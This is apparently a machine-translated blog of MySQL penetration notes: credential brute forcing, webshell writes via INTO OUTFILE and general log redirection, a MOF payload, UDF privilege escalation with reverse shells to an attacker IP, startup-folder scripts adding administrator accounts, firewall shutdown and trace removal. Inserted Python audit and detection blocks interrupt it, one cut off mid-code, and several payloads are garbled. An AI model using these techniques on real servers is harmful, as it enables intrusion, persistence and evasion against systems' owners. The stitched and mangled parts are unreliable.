(Today I went back to my MySQL study notes from a year ago and thought it would be good to share them.) Reference: www.ddosi.com/b147/
MySQL penetration and exploitation study notes
1. MySQL information collection
1.1 Collecting host information on port 3306
1.2 Collecting version information
1.3 Collecting Database Management Information
1.4 MSF information collection module
2. Obtain the MySQL password
2.1 Brute Force Cracking
2.2 Source code Leakage
2.3 File inclusion (local file inclusion)
2.4 Other circumstances
3. MySQL access to webshell (using core :))
3.1 Obtaining webshell using the phpMyadmin root account
A. Directly read a backdoor file (in the following situation)
B. Export a one-line backdoor directly with a select query
C. Create a database table and export a backdoor
D. Executable command mode
E. Use anti-virus software
F. Directly export encrypted Webshell
G. CMS obtains webshell
H. Obtaining a webshell through general_log_file
I. Obtaining a webshell from an SQLMap injection point
4. MySQL privilege escalation
4.1 MOF privilege escalation
4.2 MOF privilege escalation directly from MSF
4.3 UDF privilege escalation
1. Conditions for UDF privilege escalation
2. Privilege escalation method
3. UDF privilege escalation from a webshell
4. All-in-one MySQL privilege escalation tool
5. Privilege escalation when a webshell cannot be obtained
6. Sqlmap connecting directly to the database
7. MSF UDF privilege escalation
8. Startup-item privilege escalation
9. Other MSF-related vulnerabilities
Mysql password cracking
1. Mysql information collection
1.1 Collecting host information on port 3306
Nmap port detection:
nmap -p 3306 192.168.0.1-254
1.2 Collecting version information
(1) View the version information with MSF: the auxiliary/scanner/mysql/mysql_version module.
For example, to scan host 192.168.0.100:
use auxiliary/scanner/mysql/mysql_version
set RHOSTS 192.168.0.100
run
(2) MySQL version query commands
select @@version;
select version();
(3) SQLMap determines the information through an injection point
sqlmap -u url --dbms mysql
After login, check the version parameter under localhost -> Variables -> Server variables and settings. (Still to be verified in practice.)
1.3 Collecting Database Management Information
Communicate, communicate, phpadmin, etc.
Some of these tools save configuration information directly, including the database server address and database user name and password, which can be obtained by sniffing or cracking the configuration file
1.4 MSF information collection module
(1) MySQL hash value enumeration
use auxiliary/scanner/mysql/mysql_hashdump
set RHOSTS 192.168.0.100
set USERNAME root
set PASSWORD root
run
(2) Obtain administrative information
Gets the database version, operating system name, architecture, database directory, database users and password hashes.
use auxiliary/admin/mysql/mysql_enum
set RHOSTS 192.168.0.100
set USERNAME root
set PASSWORD root
run
(3) Execute MySQL statements. After a successful connection you can execute SQL statements from MSF, similar to sqlmap's --sql-shell.
use auxiliary/admin/mysql/mysql_sql
set RHOSTS 192.168.0.100
set USERNAME root
set PASSWORD root
set SQL show databases;
run
(4) Export the schema with mysql_schemadump to the /root/.msf4/loot/ folder
use auxiliary/scanner/mysql/mysql_schemadump
set RHOSTS 192.168.0.100
set USERNAME root
set PASSWORD root
run
The file exported to the /root/.msf4/loot/ folder contains the table structure.
(5) File enumeration and writable-directory enumeration
auxiliary/scanner/mysql/mysql_file_enum
auxiliary/scanner/mysql/mysql_writable_dirs
No tests were successful; the directories and files to enumerate need to be defined (larger directory dictionaries are required).
2. Obtain the Mysql password
2.1 Brute Force Cracking
(1) Online brute forcing through the web login page
You can use Burp Suite (https://portswigger.net/burp/) and the phpMyAdmin multi-threaded batch cracking tool (http://pan.baidu.com/s/1c1LD6co).
(2) Brute forcing from the MSF command line
The MSF module auxiliary/scanner/mysql/mysql_login takes many parameters:
use auxiliary/scanner/mysql/mysql_login
msf5 auxiliary(scanner/mysql/mysql_login) > show options

Module options (auxiliary/scanner/mysql/mysql_login):

   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   BLANK_PASSWORDS   false            no        Try blank passwords for all users
   BRUTEFORCE_SPEED  5                yes       How fast to bruteforce, from 0 to 5
   DB_ALL_CREDS      false            no        Try each user/password couple stored in the current database
   DB_ALL_PASS       false            no        Add all passwords in the current database to the list
   DB_ALL_USERS      false            no        Add all users in the current database to the list
   PASSWORD                           no        A specific password to authenticate with
   PASS_FILE                          no        File containing passwords, one per line
   Proxies                            no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                             yes       The target address range or CIDR identifier
   RPORT             3306             yes       The target port (TCP)
   STOP_ON_SUCCESS   false            yes       Stop guessing when a credential works for a host
   THREADS           1                yes       The number of concurrent threads
   USERNAME                           no        A specific username to authenticate as
   USERPASS_FILE                      no        File containing users and passwords separated by space, one pair per line
   USER_AS_PASS      false            no        Try the username as the password for all users
   USER_FILE                          no        File containing usernames, one per line
   VERBOSE           true             yes       Whether to print output for all attempts

For a single host, only RHOSTS, RPORT, USERNAME, PASSWORD and PASS_FILE need to be set. Set the other parameters as the situation requires.
(1) Scenario A: after obtaining a root password on the intranet, extend the penetration across the intranet
use auxiliary/scanner/mysql/mysql_login
set RHOSTS 192.168.0.1-254
set password root
set username root
run
Running these commands scans 192.168.0.1-254 for the MySQL password.
(2) Scenario B: scan using a password dictionary
use auxiliary/scanner/mysql/mysql_login
set RHOSTS 192.168.0.1-254
set pass_file /tmp/password.txt
set username root
run
(3) Use Nmap to scan and crack passwords
A. Brute-force scan an IP address or IP address range using Nmap's default passwords
nmap --script=mysql-brute 192.168.0.100
nmap --script=mysql-brute 192.168.0.1-254
B. Use the root account and root password to verify the MySQL login, and scan the specified IP address for port information and MySQL database information
nmap -sV --script=mysql-databases --script-args mysqluser=root,mysqlpass=root 192.168.0.100
C. Check for an empty root password
nmap --script=mysql-empty-password 192.168.0.100
(4) When using the HSCAN tool to scan MySQL passwords, the IP address range, the database password dictionary and the user name dictionary need to be set.
https://github.com/search?q=hscan
2.2 Source code Leakage
(1) Website source code backup files (sensitive files JDBC backup, Java XML configuration files)
Some website source files include database connection files, which can be viewed to obtain database accounts and passwords. Common database connection files are config.php, web.config, conn.asp, db.php/asp, jdbc.properties, sysconfig.properties and JBOSS_HOME\docs\examples\jca\XXXX-ds.xml. There used to be a tool ("dig chicken") that could be customized to scan for files named after the website with suffixes such as zip, rar, tar, tar.gz, gz and sql.
(2) Configuration backup files (bak files)
After a database configuration file is edited with UltraEdit or EditPlus, a bak file is left behind.
2.3 File inclusion (local file inclusion)
A local file inclusion vulnerability lets you include files; by viewing the file source you can obtain the database configuration file and then read the database user name and password.
2.4 Other circumstances
Some software writes the IP address, database user name and password into the program. After the program is run, the Cain software can sniff the database password. In addition, administrators of MySQL client management tools sometimes save connection records, which hold the user name, password and connection IP address or host name. The user name and password can be obtained from the configuration files or by sniffing.
The client saves the password, as well as some comments inside the password.
3. MySQL access to webshell (using core :))
3.1 Obtaining webshell using the phpMyadmin root account
Obtaining a webshell via phpMyAdmin with the MySQL root account:
A. Directly read a backdoor file (in the following situation)
The real path of the site can be obtained from program errors, the phpinfo function, the program configuration table and so on. Some sites have already been compromised, so backdoor files left in their directories can be read directly with load_file.
B. Export a one-line backdoor directly with a select query
This requires knowing the actual physical path of the website, for example /var/www or E:/WWW/. You can then run the following query to obtain cmd.php:
select '<? php @eval($_POST[thelostworld]); ? >'INTO OUTFILE '/var/www/shell.php'
C. Create a database table and export a backdoor
Execute the following code directly in the query window; the principle is similar to B.
CREATE TABLE `mysql`.`thelostworld` (`temp` TEXT NOTNULL );
INSERT INTO `mysql`.`thelostworld` (`temp` ) VALUES('<? php @eval($_POST[thelostworld]); ? > ');
SELECT `temp` FROM `thelostworld` INTO OUTFILE'/var/www/shell.php';
DROP TABLE IF EXISTS `thelostworld`;
D. Executable command mode
Create a shell that executes commands. This only works if the other party has not disabled the system function. After a successful export, DOS commands can be run as follows: www.xxx.com/shell.php?c…
select '' INTO OUTFILE '/var/www/shell.php';
In addition, under Linux, you can export a shell that directly executes commands:
SELECT '' INTO OUTFILE '/var/www/shell.php';
http://localhost/shell.php?c=cat%20/etc/passwd
E. Use anti-virus software
Upload publicguide.jpg from the background or somewhere where you can upload the image as follows:
Then export the Webshell by including temp.php in the image.
select ''INTO OUTFILE '/varwww/shell.php';
One word backdoor password: Antian365
F. Directly export encrypted Webshell
The password of the backdoor file is pp64mqa2x1rnw68. Run the following command to export the encrypted webshell: D:/WEB/IPTEST/22.php.
Note:
You can also use tool.lu/hexstr/ site’s generation…
select unhex('hexadecimal string') into dumpfile 'D:/WEB/shell.php'
G. CMS obtains webshell
In some cases the real path of the website cannot be obtained, so a webshell cannot be exported directly. You can log in with the CMS administrator account and look for a weakness to break through. For example, with Dedecms you can crack the administrator account and upload files directly to obtain a webshell. With Discuz!, a webshell can be obtained directly through the UC_key. Some systems even allow PHP files to be uploaded directly. Here are some tips for CMS penetration:
(1) The Dedecms password is either a plain MD5 or a 20-character value. If it is 20 characters, remove the first 3 characters and the last 1 character; the remaining value can then be cracked as MD5.
(2) Add salt to the PHPCMS V9 password to crack the password. Select md5(md5(pass).pass).pass).
(3) Discuz! Forum accounts are stored in the ucenter_members (discuz7.x or above) or cdb_members (discuz6.x or above) table with a password:salt. For example a0513df9929afc972f024fa4e586e829:399793.
H. Obtaining a webshell through general_log_file
(1) Check the general log configuration
show global variables like "%genera%";
(2) Disable general_log
set global general_log=off;
(3) Use the general_log option to get a webshell
set global general_log='on';
SET global general_log_file='/var/www/cmd.php';
Execute the following statement in the query window:
SELECT '';
The shell is cmd.php, and the password is CMD.
I. Obtaining a webshell from an SQLMap injection point
The account behind the SQLMap injection point must have write permission, which usually means the root account, to obtain a webshell. Run the commands:
sqlmap -u url --os-shell
echo "" >/data/www/shell.php
4. Mysql lift rights
4.1 MOF privilege escalation
(1) Upload a MOF file through a webshell to escalate privileges
Reference: MySQL Server for Windows Remote SYSTEM Level Exploit (Stuxnet technique) 0day (www.exploit-db.com/exploits/23…). Windows Management Instrumentation (WMI) provides the following three methods for compiling Managed Object Format (MOF) files into the WMI repository:
Method 1: Run mofcomp.exe with the MOF file specified as a command-line parameter.
Method 2: Use the IMofCompiler interface and the CompileFile method.
Method 3: Drag and drop the MOF file into the %SystemRoot%\System32\Wbem\MOF folder.
Microsoft recommends compiling MOF files into the repository with the first two methods, that is, running mofcomp.exe or using the IMofCompiler::CompileFile method. The third method is provided only for backward compatibility with earlier versions of WMI and should not be used, because the feature may not be available in future versions. Note that the MOF method can be used only if the current root account can copy files to the %SystemRoot%\System32\Wbem\MOF directory; otherwise it fails.
Using this vulnerability requires MySQL root privileges. Kingcope published a Perl exploit script with the 0day:
perl mysql_win_remote.pl 192.168.2.100 root "" 192.168.2.150 5555
192.168.2.100 is the server where the MySQL database resides, the MySQL password is empty, and the shell is bounced back to port 5555 on 192.168.2.150.
(2) Generate the nullevt.mof file
Save the following code as a nullevt.mof file:
#pragma namespace("\\.\root\subscription")
instance of __EventFilter as $EventFilter
{
EventNamespace = "Root\Cimv2";
Name = "filtP2";
Query = "Select \ From __InstanceModificationEvent "
"Where TargetInstance Isa \"Win32_LocalTime\" "
"And TargetInstance.Second = 5";
QueryLanguage = "WQL";
};
instance of ActiveScriptEventConsumer as $Consumer
{
Name = "consPCSV2";
ScriptingEngine = "JScript";
ScriptText =
"var WSH = new ActiveXObject(\"WScript.Shell\")\nWSH.run(\"net.exe user admin admin /add")";
};
instance of __FilterToConsumerBinding
{
Consumer = $Consumer;
Filter = $EventFilter;
};
(3) Import files through Mysql query
Import the nullevt.mof generated above into c:\windows\system32\wbem\mof\ (access to this directory is denied by default on Windows 7). After the import, the system runs the command automatically.
select load_file('C:\RECYCLER\nullevt.mof') into dumpfile 'c:/windows/system32/wbem/mof/nullevt.mof';
4.2 MOF privilege escalation directly from MSF
MSF's exploit/windows/mysql/mysql_mof module performs MOF privilege escalation directly, but whether it succeeds depends on the operating system permissions and the MySQL version. On success, a meterpreter shell connects back directly.
use exploit/windows/mysql/mysql_mof
set rhost 192.168.0.100 // IP address of the remote host to escalate on
set rport 3306 // remote MySQL port
set password root // root password of the MySQL database
set username root // MySQL user name
options // view the settings
run 0
Tips:
If you can manage the database through a web interface (phpMyAdmin), you can change the host to % and flush privileges; tools such as MSF can then connect to the database remotely. By default, accounts such as root cannot connect remotely unless the administrator or database user has configured it.
Approach 1: Change the host of root to % in the user table of the mysql database
use mysql;
update user set host = '%' where user = 'root';
FLUSH PRIVILEGES;
select host, user from user;
Approach 2: Direct authorization (recommended)
Allow user root to connect to the MySQL server from any host with the password youpassword (your root password):
# mysql -u root -proot
GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' IDENTIFIED BY 'youpassword' WITH GRANT OPTION;
FLUSH PRIVILEGES;
Adding a separate user is recommended. In actual tests, many servers were found to use root configured for multiple IP addresses, and changing them may affect the running system. During testing, create a new user and grant it all privileges rather than changing the root configuration directly.
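The settings these notes rely on (unrestricted file export, a general log file that can be pointed into the web root, root reachable from any host) can be checked from the defender's side. The following is an added example, not code from the original notes: an offline audit over values collected beforehand from SHOW GLOBAL VARIABLES and SHOW GRANTS. The function names, finding codes and sample data are constructed for illustration; the web roots are the directories that appear in these notes.

```python
# Added example: offline audit of MySQL settings and accounts.
# All sample values below are constructed.
SCRIPT_EXTS = (".php", ".asp", ".aspx", ".jsp")
WEB_ROOTS = ["/var/www", "/data/www", "D:/WEB", "C:/phpStudy"]  # paths seen in the notes


def norm(path):
    """Normalise Windows/Unix paths so they can be compared."""
    return path.replace("\\", "/").rstrip("/").lower()


def is_under(path, root):
    p, r = norm(path), norm(root)
    return p == r or p.startswith(r + "/")


def audit(variables, accounts, web_roots):
    """Return a list of (severity, code, detail) findings."""
    findings = []

    # secure_file_priv: "" = no restriction, a path = restricted to that
    # directory, None (SQL NULL) = import/export disabled.
    sfp = variables.get("secure_file_priv")
    if sfp == "":
        findings.append(("HIGH", "SECURE_FILE_PRIV_EMPTY",
                         "INTO OUTFILE/DUMPFILE and LOAD_FILE are unrestricted"))
    elif sfp is not None and any(is_under(sfp, r) for r in web_roots):
        findings.append(("HIGH", "SECURE_FILE_PRIV_IN_WEBROOT", sfp))

    # A general log that the web server can serve or execute.
    log_file = variables.get("general_log_file") or ""
    if log_file and (norm(log_file).endswith(SCRIPT_EXTS)
                     or any(is_under(log_file, r) for r in web_roots)):
        active = str(variables.get("general_log", "OFF")).upper() in ("ON", "1")
        findings.append(("HIGH" if active else "MEDIUM",
                         "GENERAL_LOG_FILE_SERVABLE", log_file))

    for acct in accounts:
        name = f"{acct['user']}@{acct['host']}"
        privs = {p.upper() for p in acct["privs"]}
        # FILE allows server-side file reads/writes; SUPER allows changing
        # global variables such as general_log_file at runtime.
        powerful = privs & {"ALL PRIVILEGES", "FILE", "SUPER"}
        if not acct.get("auth_string"):
            findings.append(("HIGH", "EMPTY_PASSWORD", name))
        if acct["host"] == "%" and powerful:
            findings.append(("HIGH", "POWERFUL_ACCOUNT_ANY_HOST",
                             f"{name}: {sorted(powerful)}"))
        elif powerful and acct["user"] != "root":
            findings.append(("MEDIUM", "FILE_OR_SUPER_GRANTED",
                             f"{name}: {sorted(powerful)}"))
    return findings


# Constructed sample: a weakly configured server.
WEAK_VARS = {"secure_file_priv": "", "general_log": "OFF",
             "general_log_file": "/var/www/cmd.php"}
WEAK_ACCOUNTS = [
    {"user": "root", "host": "%", "privs": ["ALL PRIVILEGES"], "auth_string": "*CONSTRUCTED"},
    {"user": "app", "host": "10.0.0.5", "privs": ["SELECT", "INSERT", "UPDATE"], "auth_string": "*CONSTRUCTED"},
    {"user": "report", "host": "localhost", "privs": ["SELECT", "FILE"], "auth_string": "*CONSTRUCTED"},
    {"user": "backup", "host": "%", "privs": ["SELECT"], "auth_string": ""},
]

# Constructed sample: the same server after hardening.
HARDENED_VARS = {"secure_file_priv": "/var/lib/mysql-files", "general_log": "OFF",
                 "general_log_file": "/var/lib/mysql/db01.log"}
HARDENED_ACCOUNTS = [
    {"user": "root", "host": "localhost", "privs": ["ALL PRIVILEGES"], "auth_string": "*CONSTRUCTED"},
    {"user": "app", "host": "10.0.0.5", "privs": ["SELECT", "INSERT", "UPDATE"], "auth_string": "*CONSTRUCTED"},
]

if __name__ == "__main__":
    for finding in audit(WEAK_VARS, WEAK_ACCOUNTS, WEB_ROOTS):
        print(*finding, sep=" | ")
```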
4.3 UDF privilege escalation
UDF privilege escalation uses MySQL's user-defined function feature to turn a MySQL account into system privileges. The conditions are: the target system is Windows (Win2000, XP, Win2003); you have a MySQL user account with insert and delete permissions so that functions can be created and dropped; and you have the root password.
UDF privilege escalation on Windows applies to servers running Windows 2008 or earlier; that is, the success rate is high on Windows 2000 and Windows 2003.
1. Conditions for UDF privilege escalation
(1) The udf.dll file must be stored in the lib\plugin folder of the MySQL installation directory.
(2) If the MySQL version is earlier than 5.1, udf.dll is stored in C:\windows\system32 on Windows 2003 and C:\winnt\system32 on Windows 2000.
(3) The MySQL account has insert and delete permissions on mysql so that functions can be created and dropped. The root account is generally preferred; other accounts with the same permissions as root can also be used.
(4) You have permission to write udf.dll to the corresponding directory.
2. Privilege escalation method
(1) Obtain the database version, data location, plug-in location and other information
select version();
select user();
select @@basedir;
show variables like '%plugins%'; // find the MySQL installation path
(2) Export path
C:\Windows\udf.dll    Windows 2000
C:\Windows\udf.dll    Windows 2003
For MySQL 5.1 or later, udf.dll must be placed in the lib\plugin folder of the MySQL installation directory before custom functions can be created. This directory does not exist by default, so you need to use a webshell to find the MySQL installation directory, create the lib\plugin folder in it, and export the udf.dll file to this directory.
In some cases you get the error Can't open shared library; in that case udf.dll needs to be exported to the lib\plugin directory.
select @@basedir;
select 'It is dll' into dumpfile 'C:\Program Files\MySQL\MySQL Server 5.1\lib::$INDEX_ALLOCATION';
select 'It is dll' into dumpfile 'C:\Program Files\MySQL\MySQL Server 5.1\lib\plugin::$INDEX_ALLOCATION'; // create the plugin directory using NTFS ADS
After successful execution, the plugin directory exists; then export udf.dll.
(3) Create the cmdshell function. Whatever name the function is given is the name used to call it in later queries.
create function cmdshell returns string soname 'lib_mysqludf_sys.dll';
(4) Execute commands:
select sys_eval('whoami');
In general, creation does not fail.
If you cannot connect to 3389, stop the Windows firewall and filtering first:
select sys_eval('net stop policyagent');
select sys_eval('net stop sharedaccess');
Common functions in udf.dll:
cmdshell: execute cmd;
downloader: download the specified file from the Internet and save it to the specified directory;
open3389: open the 3389 terminal service, with an optional port (no restart needed if the port is not changed);
backshell: reverse shell;
ProcessView: enumerate system processes;
KillProcess: terminate the specified process;
regread: read the registry;
regwrite: write the registry;
shut: shut down, log off, restart;
about: description and help function.
Specific usage examples:
select cmdshell('net user iis_user 123!@#abcABC /add');
select cmdshell('net localgroup administrators iis_user /add');
select cmdshell('regedit /s d:web3389.reg');
select cmdshell('netstat -an');
(5) Remove traces
drop function cmdshell; // delete the function
Delete udf.dll and other intrusion files and logs.
(6) Common errors
1290 -- The MySQL server is running with the --secure-file-priv option so it cannot execute this statement
Comment out (with a # sign) the line containing secure_file_priv in my.ini or mysql.cnf (check with SHOW VARIABLES LIKE "secure_file_priv").
1123 -- Can't initialize function 'backshell'; UDFs are unavailable with the --skip-grant-tables option
Remove the skip-grant-tables option from my.ini.
3. UDF privilege escalation from a webshell
Using a webshell with built-in UDF privilege escalation, enter the database user name and password and the database server address or IP address, connect, and export to escalate privileges.
4. All-in-one MySQL privilege escalation tool
V5est0r wrote an all-in-one MySQL privilege escalation tool (https://github.com/thelostworldFree/Python_FuckMySQL):
(1) Automatically exports a backdoor and a MOF file
(2) Automatically determines the MySQL version and exports the UDF DLL to different directories according to the version, for UDF privilege escalation
(3) Exports an LPK.dll file to hijack the system directory for privilege escalation
(4) Writes a startup item for privilege escalation
UDF automatic privilege escalation:
Python root.py -a 127.0.0.1 -p root -e "ver&whoami" -m udf
LPK:
Python root.py -a 127.0.0.1 -p root -e "ver&whoami" -m LPK
Py -a 127.0.0.1 -p root -e "ver&whoami" -mst
For example, run LOAD_FILE to check the MySQL configuration file my.ini. This cannot be exercised
5. Privilege escalation when a webshell cannot be obtained
1. Connect to MySQL
(1) mysql.exe -h ip -uroot -p
(2) phpMyAdmin
(3) Navicat for MySQL
2. View the database version and data path
SELECT VERSION();
select @@datadir;
For versions below 5.1, export the DLL to c:/windows or c:/windows/system32/
For 5.1 and later versions, run the following commands to query the plug-in path:
SHOW VARIABLES WHERE Variable_Name LIKE "%dir";
show variables like '%plugin%';
select load_file('C:/phpStudy/Apache/conf/httpd.conf')
select load_file('C:/phpStudy/Apache/conf/vhosts.conf')
select load_file('C:/phpStudy/Apache/conf/extra/vhosts.conf')
select load_file('C:/phpStudy/Apache/conf/extra/httpd.conf')
select load_file('d:/phpStudy/Apache/conf/vhosts.conf')
3. Modify mysql.txt
mysql.txt is the udf.dll binary file converted into hexadecimal code.
(1) First import the content into the Ghost table
Modify the following code: select backshell("YourIP",4444);
(2) Export the file to a directory
select data from Ghost into dumpfile 'c:/windows/mysqldll.dll';
select data from Ghost into dumpfile 'c:/windows/system32/mysqldll';
select data from Ghost into dumpfile 'c:/phpStudy/MySQL/lib/plugin/mysqldll';
select data from Ghost into dumpfile 'E:/PHPnow-1.5.6/MySQL-5.0.90/lib/plugin/mysqldll';
select data from Ghost into dumpfile 'C:/websoft/MySQL/MySQL Server 5.5/lib/plugin/mysqldll.dll'
select data from Ghost into dumpfile 'D:/phpStudy/MySQL/lib/plugin/mysqldll.dll';
select load_file('C:/ProgramData/MySQL/MySQL Server 5.1/Data/mysql/user.frm');
select data from Ghost into dumpfile 'C:\Program Files\MySQL\MySQL Server 5.1\lib/plugin/mysqldll.dll'
(3) Check whether cmdshell and backshell exist in FUNCTION
drop FUNCTION cmdshell; // delete cmdshell
drop FUNCTION backshell; // delete backshell
CREATE FUNCTION backshell RETURNS STRING SONAME 'mysqldll.dll'; // create backshell
nc -vv -l -p 44444
Run the following query to call backshell:
select backshell("192.192.192.1",44444); // Change 192.192.192.1 to your IP address and port number
4. Add a user after obtaining the shell
Go to c:\windows\system32\ and run:
net user antian365 www.xianzhi.aliyun.com /add
net localgroup administrators antian365
6. Sqlmap connecting directly to the database
Sqlmap can connect directly to the database to escalate privileges. Write permission and the root account and password are required. Run the following commands:
(1) Connect to the database
sqlmap.py -d "mysql://root:[email protected]:3306/mysql" --os-shell
(2) Select the operating system architecture: 1 for 32-bit, 2 for 64-bit.
(3) The UDF is uploaded automatically, or the os-shell prompt is displayed.
(4) Run the whoami command.
7. MSF UDF privilege escalation
Run on the Kali penetration testing platform (Kali download: https://www.kali.org/downloads/):
msfconsole
use exploit/windows/mysql/mysql_payload
options
set rhost 192.168.2.1
set rport 3306
set username root
set password 123456
run 0 (or exploit)
The success rate of MSF UDF privilege escalation is not high. It depends on permissions and the database version, and in particular on the secure-file-priv option, with which it is unlikely to succeed.
8. Startup-item privilege escalation
1. Create a table and insert the VBS script into the table
Use the following commands in sequence:
show databases;
use test;
show tables;
create table a (cmd text);
insert into a values ("set wshshell=createobject (""wscript.shell"" ) " );
insert into a values ("a=wshshell.run (""cmd.exe /c net user aspnetaspnettest/add"",0)") ;
insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup Administrators aspnet /add"",0) " );
select * from a;
2. Export the VBS script to the startup folder
Use the following command to export the VBS script just created in table a to the startup folder:
select * from a into outfile "C:\Documents and Settings\All Users\"Start" menu\program\start\a.vbs";
After the import is successful, the system automatically adds the user whose password is 1 and user name is 1 to the administrator group upon the restart. In actual use, the probability of the script being executed successfully is low, and sometimes the script cannot be exported at all. The following script is recommended:
show databases;
use test;
show tables;
create table b (cmd text);
insert into b values ("net user Aspnet123545345! /add");
insert into b values ("net localgroup administrators Aspnet /add");
insert into b values ("del b.bat");
select * from b into outfile "C:\Documents and Settings\All Users\"Start" menu\program\start\b.bat";
This script pops up a DOS window when it runs, but as long as you have permission to export it to the startup folder, it will execute successfully. After connecting to the virtual machine through a MySQL connector and executing the above commands, you will find the exported b.bat script in the C:\Documents and Settings\All Users\"Start" menu\program\start directory. The name of this startup directory may differ between operating systems; in that case, replace it with the corresponding directory name. For example, if the operating system is an English version, the statement is:
select * from b into outfile "C:\Documents and Settings\All Users\Start Menu\Programs\Startup\b.bat";
The Windows Server 2008 startup directory is C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\, for example iis.vbs. The VBS procedure is as follows:
create table a (cmd text);
insert into a values ("set wshshell=createobject (""wscript.shell"" ) " );
insert into a values ("a=wshshell.run (""cmd.exe /c net user antian365 qwer1234!@# /add"",0) " );
insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup Administrators antian365 /add"",0) " );
select * from a into outfile "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\iis.vbs";
3. The MSF module exploit/windows/mysql/mysql_start_up
use exploit/windows/mysql/mysql_start_up
set rhost 192.168.2.1
set rport 3306
set username root
set password 123456
run
mysql_start_up under MSF has a certain probability of succeeding, and it works well on English versions of the system.
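Sections 3, 4 and 8 all come down to a handful of SQL statement shapes: INTO OUTFILE or INTO DUMPFILE aimed at a web root, the WMI MOF directory, the plugin directory or a startup folder; SET GLOBAL general_log_file; and CREATE FUNCTION ... SONAME. The following is an added example, not code from the original notes: detection logic that flags those shapes in query-log lines. The log line layout, the rule names and the allowed export directory are assumptions, and the sample lines are constructed with placeholder payloads.

```python
# Added example: flag the statement shapes described in these notes.
import posixpath
import re

SCRIPT_EXTS = (".php", ".asp", ".aspx", ".jsp")

# Assumed line layout: "<timestamp> <thread id> Query <sql>"
QUERY_RE = re.compile(r"^(\S+)\s+(\d+)\s+Query\s+(.*)$")
OUTFILE_RE = re.compile(r"\binto\s+(?:outfile|dumpfile)\s*(['\"])(.+?)\1", re.I)
LOGFILE_RE = re.compile(r"\bset\s+global\s+general_log_file\s*=\s*(['\"])(.+?)\1", re.I)
UDF_RE = re.compile(
    r"\bcreate\s+(?:aggregate\s+)?function\s+(\w+)\s+returns\s+\w+\s+soname\s*(['\"])(.+?)\2",
    re.I)


def normalise(path):
    """Unify separators and case, and collapse ../ segments."""
    return posixpath.normpath(path.replace("\\", "/")).lower()


def classify_target(path):
    """Name the kind of location a server-side file write is aimed at."""
    p = normalise(path)
    if "/wbem/mof/" in p:
        return "wmi-mof-dir"
    if "/lib/plugin/" in p or p.endswith((".dll", ".so")):
        return "udf-library"
    if "/startup/" in p:
        return "startup-folder"
    if p.endswith(SCRIPT_EXTS):
        return "web-script"
    return "unexpected-path"


def detect(lines, export_dir="/var/lib/mysql-files"):
    """Return (thread_id, rule, detail) for every suspicious statement.

    Writes below export_dir (the assumed legitimate export location)
    are treated as expected and not reported.
    """
    allowed = normalise(export_dir) + "/"
    findings = []
    for line in lines:
        m = QUERY_RE.match(line)
        if not m:
            continue
        thread, sql = int(m.group(2)), m.group(3)
        for hit in OUTFILE_RE.finditer(sql):
            target = hit.group(2)
            if not normalise(target).startswith(allowed):
                findings.append((thread, "file-write:" + classify_target(target), target))
        hit = LOGFILE_RE.search(sql)
        if hit:
            findings.append((thread, "general-log-redirect", hit.group(2)))
        hit = UDF_RE.search(sql)
        if hit:
            findings.append((thread, "udf-create", f"{hit.group(1)} -> {hit.group(3)}"))
    return findings


# Constructed sample log lines.
SAMPLE_LOG = [
    "2024-01-10T09:00:00Z 31 Query SELECT id, name FROM shop.products WHERE id = 7",
    "2024-01-10T09:01:00Z 32 Query SELECT 'placeholder' INTO OUTFILE '/var/www/shell.php'",
    "2024-01-10T09:02:00Z 32 Query SET global general_log_file='/var/www/cmd.php'",
    "2024-01-10T09:03:00Z 33 Query select load_file('C:/tmp/a.mof') into dumpfile 'c:/windows/system32/wbem/mof/nullevt.mof'",
    "2024-01-10T09:04:00Z 33 Query CREATE FUNCTION cmdshell RETURNS STRING SONAME 'udf.dll'",
    "2024-01-10T09:05:00Z 34 Query SELECT * FROM orders INTO OUTFILE '/var/lib/mysql-files/orders.csv'",
    "2024-01-10T09:06:00Z 34 Query SELECT 1 INTO OUTFILE '/var/lib/mysql-files/../../www/x.php'",
    "2024-01-10T09:07:00Z 35 Query select * from b into outfile 'C:/ProgramData/Microsoft/Windows/Start Menu/Programs/Startup/b.bat'",
]

if __name__ == "__main__":
    for finding in detect(SAMPLE_LOG):
        print(finding)
```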
9. Other Msf related vulnerability rights
1.Mysql Authentication Vulnerability and Utilization (CVE-2012-2122)
When connecting to MariaDB/MySQL, the entered password is compared with the expected correct password. Because of incorrect handling, MySQL may consider the two passwords identical even when memcmp() returns a non-zero value. In other words, knowing only the user name and repeatedly trying is enough to log in to the SQL database directly. According to the announcement, about 256 attempts are enough to succeed once. Affected products: all MariaDB and MySQL versions up to 5.1.61, 5.2.11, 5.3.5 and 5.5.22 are vulnerable.
MariaDB versions from 5.1.62, 5.2.12, 5.3.6 and 5.5.23 are not vulnerable.
MySQL versions from 5.1.63, 5.5.24 and 5.6.6 are not vulnerable.
1.use auxiliary/scanner/mysql/mysql_authbypass_hashdump
2.exploit/windows/mysql/mysql_yassl_hello
3.exploit/windows/mysql/scrutinizer_upload_exec
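Both the brute-force scans in section 2.1 and the repeated login attempts described above for CVE-2012-2122 leave the same trace: a burst of denied connections from one source, sometimes ending in a successful login. The following is an added example, not code from the original notes, that detects that pattern. The log line layout is an assumption modelled on query-log "Connect" entries, the sample lines are constructed, and the threshold and window are illustrative defaults.

```python
# Added example: detect bursts of failed MySQL logins and a success that
# follows such a burst.
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

TS_FMT = "%Y-%m-%dT%H:%M:%SZ"
# Assumed layout: "<timestamp> <thread id> Connect <details>"
DENIED_RE = re.compile(
    r"^(\S+)\s+\d+\s+Connect\s+Access denied for user '([^']*)'@'([^']*)'")
OK_RE = re.compile(r"^(\S+)\s+\d+\s+Connect\s+(\S+?)@(\S+)\s+on\b")


def detect(lines, threshold=10, window=timedelta(seconds=60)):
    """Return alerts as (kind, source_host, failures_in_window)."""
    failures = defaultdict(deque)  # source host -> timestamps of recent denials
    alerted = set()                # hosts already reported for the current burst
    alerts = []
    for line in lines:
        denied = DENIED_RE.match(line)
        ok = None if denied else OK_RE.match(line)
        event = denied or ok
        if not event:
            continue
        ts = datetime.strptime(event.group(1), TS_FMT)
        host = event.group(3)
        recent = failures[host]
        # Drop denials that have fallen out of the sliding window.
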